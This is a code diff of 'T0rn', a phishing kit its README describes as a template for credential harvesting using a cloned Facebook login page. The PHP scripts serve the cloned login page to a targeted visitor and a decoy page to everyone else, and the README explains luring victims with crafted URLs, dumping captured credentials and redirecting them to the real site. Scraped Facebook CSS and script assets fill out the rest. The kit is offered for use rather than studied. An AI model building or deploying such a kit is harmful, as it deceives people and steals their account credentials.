updated version

Download_latest_Series_and_Movies.php

@@ -0,0 +1,23 @@
+<?php
+//Twitter: @johntroony
+//Github: JohnTroony
+
+//confirm the link contains the right id and open the webpage saved as main.jpg
+$id = $_GET["code"];
+if ($id == "Transformers-4_age_of_extinction") {
+      $myFile = "main.jpg";
+      $fh = fopen($myFile, 'r');
+      $theData = fread($fh, 500000);
+      fclose($fh);
+      echo $theData;
+}
+
+//if url contains diffrent id content then open webpage saved as fake.jpg
+else{
+     $myFile1 = "fake.jpg";
+     $fh1 = fopen($myFile1, 'r');
+     $theData1 = fread($fh1, 500000);
+     fclose($fh1);
+     echo $theData1;
+}
+?>

README.md

@@ -1,4 +1,14 @@
-T0rn
-====
+T0rn is a Social Eng. template I had created like 2-3 years ago.. I have not been 
+updating it a lot (last time I did == 2013).
 
-Social Eng. template for credential haversting. (Facebook as a sample)
+I've cloned a FB page, a Debian page and another random html page; The debian page is the
+index file of the folder and the other two files I've saved them as .jpg files.
+
+So to trick a user, you have to craft a nice url that  Security_Check.php can understand,
+(in this case I've created Download_latest_Series_and_Movies.php)
+e.g.  redirect the targeted user to a login page (in this case FB page) then dump the credentials 
+using the push.php file and do the redirection to the legit FB account. If it's not the targeted 
+user, redirect to the random html page.
+
+I'll include a detailed user guide of the scripts later, but if you understand PHP go ahead and
+have some fun :)

Security_Check.php

@@ -0,0 +1,25 @@
+<?php
+//Twitter: @johntroony
+//Github: JohnTroony
+
+//assign variable
+$id = $_GET["code"];
+
+//logical test 
+if ($id == "FaceBook") {
+      $myFile = "main.jpg";
+      $fh = fopen($myFile, 'r');
+      $theData = fread($fh, 500000);
+      fclose($fh);
+      echo $theData;
+}
+
+//when logical test fail
+else{
+     $myFile1 = "fake.jpg";
+     $fh1 = fopen($myFile1, 'r');
+     $theData1 = fread($fh1, 500000);
+     fclose($fh1);
+     echo $theData1;
+}
+?>

Warning_files/11.htm

@@ -0,0 +1,3 @@
+
+<!-- saved from url=(0505)http://0.173.channel.facebook.com/iframe/11?r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyW%2Fr%2F1tCvb1OvuW2.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyi%2Fr%2FpVGwKD_WRk2.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fy9%2Fr%2FWV8fflIylNe.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyT%2Fr%2FSPkUm10tkNJ.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fy1%2Fr%2Fv2jVZ3jUa94.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyW%2Fr%2FuePByRiHfp2.js -->
+<html class=""><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script type="text/javascript" src="./Warning_files/1tCvb1OvuW2.js"></script><script type="text/javascript" src="./Warning_files/pVGwKD_WRk2.js"></script><script type="text/javascript" src="./Warning_files/WV8fflIylNe.js"></script><script type="text/javascript" src="./Warning_files/SPkUm10tkNJ.js"></script><script type="text/javascript" src="./Warning_files/v2jVZ3jUa94.js"></script><script type="text/javascript" src="./Warning_files/uePByRiHfp2.js"></script></head><body></body></html>

Warning_files/5NXXu7PB2Tl.css

@@ -0,0 +1,68 @@
+/*1300201853,169776067*/
+
+.oob_captcha .contacts_row{vertical-align:top}
+.oob_captcha .inputbutton{margin-right:10px}
+#secq_captcha_controls{margin-top:10px}
+.secq_captcha_prompt{font-size:13px}
+#secq_captcha_response{margin-left:10px}
+#smsscarce_captcha_instructions{margin-top:5px}
+.roadblock .steps{margin-left:auto;margin-right:auto;width:740px}
+.roadblock .roadblock_dialog{width:740px}
+.roadblock .friend_photo_dialog{width:1050px}
+.roadblock .error{margin-bottom:15px}
+.roadblock .inputcheckbox{margin:0 10px 0 0}
+.roadblock #content p,.roadblock #content ul{font-size:13px;line-height:1.5em;margin:0 0 15px 0;padding:0}
+.roadblock #content ul.errlist{margin:0 0 0 12px}
+.roadblock #content .error p{line-height:14px;margin:4px 0 0 0}
+.roadblock .UIContentBox{padding:0}
+.roadblock .mcafee_header{background:#aa0828 url(http://static.ak.fbcdn.net/rsrc.php/v1/zC/r/Jn7Qnt7VheR.gif) no-repeat 5px 5px;border-color:#7f0820;border-style:solid;border-width:1px 1px 0 1px;margin:-1px -1px 0 -1px;padding-top:28px}
+.roadblock .title_header{background:none;margin-bottom:10px;padding:0}
+.roadblock .title_header .title_h{background:none;font-size:12px;line-height:18px;padding:0}
+.roadblock .title_header h2.title_h{display:none}
+.roadblock #captcha_error_msg{margin-bottom:15px}
+.roadblock #captcha{margin:0 auto;padding:15px 0;width:310px}
+.roadblock #captcha h3{display:none}
+.roadblock #captcha label,.roadblock #captcha .captcha_input label{margin-right:7px;color:#666}
+.roadblock #captcha .recaptcha_text{font-size:12px;line-height:18px}
+.roadblock #captcha #recaptcha_image{margin-bottom:7px}
+.roadblock #captcha_response{margin-left:0}
+.roadblock .editor{margin:15px auto;width:310px}
+.roadblock .editor .label{color:#666;font-size:12px;font-weight:bold;padding:5px 5px 0 0;text-align:right;vertical-align:top}
+.roadblock .editor .tips{padding:5px 0 10px}
+.roadblock #content ul.security_tips{list-style:square;margin:0 0 15px 15px}
+.roadblock #content ul.security_tips_not_bold{list-style:square;margin:10px 0 10px 15px}
+.roadblock ul.security_tips img{padding-top:5px}
+.roadblock #content ul.delta_instructions{list-style:square;margin:0 0 15px 30px}
+.roadblock .buttons_roadblock{padding-top:15px;text-align:center}
+.roadblock .friend_photo_captcha #captcha{width:inherit}
+.roadblock #friendphotocaptcha_intro{width:inherit}
+.roadblock #friendphotocaptcha_intro p{padding:10px}
+.roadblock #friendphotocaptcha_choices{font-size:10px;font-weight:normal}
+.roadblock .UIMeter{display:inline-block;text-align:left}
+.roadblock .UIMeterLabel{font-weight:bold;padding-left:10px;vertical-align:middle;padding-top:3px}
+.roadblock .infected_files{font-weight:bold}
+.roadblock .removal_option_section{margin-bottom:25px}
+.roadblock .removal_option_section label{display:inline-block;line-height:1.4em}
+.roadblock .removal_option_section label strong{padding-right:5px}
+.roadblock .infected_files2{border:1px solid #bdc7d8;font-family:"lucida grande",tahoma,verdana,arial,sans-serif;font-size:11px;padding:3px;overflow:auto;height:350px}
+.roadblock .filelist{overflow:auto;height:350px}
+.roadblock label{font-size:12px;color:#000;font-weight:normal}
+.roadblock .opt_out{display:block;padding-top:5px}
+.roadblock .mcafee_logo{position:relative;top:5px;padding-right:10px}
+.roadblock_me .landing_page_form_buttons{padding-top:10px;text-align:center}
+.roadblock #roadblock_challenge_choices{padding:15px}
+.roadblock #roadblock_challenge_choices_list{padding:5px 10px 0 10px}
+.roadblock table.delta_list{margin-left:auto;margin-right:auto;width:100%}
+.roadblock table.delta_list tr td{padding:3px 0 3px 5px}
+.roadblock table.delta_list tr td.header_option{text-align:center}
+.roadblock table.delta_list tr.table_header td{border-bottom:1px solid #ccc;font-weight:bold}
+.roadblock table.delta_list tr.table_row td{border-bottom:1px solid #e3e6f1}
+.roadblock table.delta_list tr.table_row td.option_me{width:70px;background-color:#e0fcc6;text-align:center;padding:0}
+.roadblock table.delta_list tr.table_row td.option_not_me{width:70px;background-color:#e8afa8;text-align:center;padding:0}
+.roadblock table.checkpoint_steps{margin-left:50px}
+.roadblock table.checkpoint_steps tr td.cp_step_text{font-size:13px;padding-left:5px}
+.roadblock .subheading{font-size:13px}
+.roadblock .subsection{margin-left:30px}
+.warning_page #content p{line-height:19px;font-size:13px;margin-bottom:0}
+
+#bootloader_lh54U { height: 42px; }

Warning_files/63yWOzL5TNM.js

@@ -0,0 +1,7 @@
+/*1297738453,169775812*/
+
+if (window.CavalryLogger) { CavalryLogger.start_js(["pzflD"]); }
+
+function send_error_signal(a,b){if(window.Env&&window.Env.error_uri)if(a&&a=='async_error'&&b&&(b.indexOf('1004:')===0||b.indexOf('12029:')===0||b.indexOf('12031:')===0||b.indexOf('12152:')===0)&&b.indexOf('scribe_endpoint.php')==-1){new AsyncRequest().setURI('/ajax/chat/scribe_endpoint.php').setData({c:'async_error',m:b}).setMethod('GET').setReadOnly(true).setOption('suppressEvaluation',true).setOption('suppressErrorAlerts',true).setHandler(bagofholding).setErrorHandler(bagofholding).send(true);}else new AsyncSignal(window.Env.error_uri,{c:a,m:b}).send();}
+
+if (window.Bootloader) { Bootloader.done(["pzflD"]); }